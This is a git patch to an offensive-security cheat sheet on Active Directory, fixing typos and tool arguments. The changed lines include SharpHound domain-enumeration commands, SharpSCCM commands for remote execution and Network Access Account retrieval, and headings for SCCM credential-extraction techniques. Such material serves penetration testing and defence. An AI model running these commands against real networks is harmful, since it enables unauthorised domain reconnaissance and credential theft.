From 581fdf4f18fa9f97b7f8a0e4d487f1f055309c77 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 22 Mar 2024 12:41:22 +0100 Subject: [PATCH] SCCM typos + SharpHound new args --- docs/active-directory/ad-adds-enumerate.md | 3 ++- docs/active-directory/deployment-sccm.md | 16 ++++++++-------- 2 files changed, 10 insertions(+), 9 deletions(-) diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md index f69c6f5..f50f9bd 100644 --- a/docs/active-directory/ad-adds-enumerate.md +++ b/docs/active-directory/ad-adds-enumerate.md @@ -23,7 +23,8 @@ Use the correct collector: .\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder .\SharpHound.exe -c all --LdapUsername --LdapPassword --domaincontroller 10.10.10.100 -d active.htb - .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23 + + .\SharpHound.exe -c All,GPOLocalGroup --outputdirectory C:\Windows\Temp --prettyprint --randomfilenames --collectallproperties --throttle 10000 --jitter 23 --outputprefix internalallthething ``` * Use [BloodHoundAD/SharpHound.ps1](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1) - run the collector on the machine using Powershell ```powershell diff --git a/docs/active-directory/deployment-sccm.md b/docs/active-directory/deployment-sccm.md index 1642ae9..2b00a8c 100644 --- a/docs/active-directory/deployment-sccm.md +++ b/docs/active-directory/deployment-sccm.md @@ -10,7 +10,7 @@ * Using **SharpSCCM** ```ps1 - .\SharpSCCM.exe get device --server --site-code + .\SharpSCCM.exe get devices --server --site-code .\SharpSCCM.exe exec -d -r .\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug ``` @@ -81,13 +81,13 @@ * [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md) -Requirements: +**Requirements**: * On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1 * On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1 * PXE-enabled distribution point -Exploitation: +**Exploitation**: * [csandker/pxethiefy](https://github.com/csandker/pxethiefy) ```ps1 @@ -101,12 +101,12 @@ Exploitation: * [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md) -Requirements: +**Requirements**: * PKI certificates are not required for client authentication * Domain accounts credential -Exploitation: +**Exploitation**: Create a machine or compromise an existing one, then request policies such as `NAAConfig` @@ -116,7 +116,7 @@ SharpSCCM get naa ``` -### CRED-3 Extract currently deployed credentials stored as DPAPI blobs and decrypt +### CRED-3 Extract currently deployed credentials stored as DPAPI blobs > Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials. @@ -158,7 +158,7 @@ From a remote machine. ``` -### CRED-4 Extract legacy credentials stored as DPAPI blobs and decrypt +### CRED-4 Extract legacy credentials stored as DPAPI blobs * [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md) @@ -187,7 +187,7 @@ From a remote machine. -### CRED-5 Extract and decrypt the SC_UserAccount table from the site database +### CRED-5 Extract the SC_UserAccount table from the site database * [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md)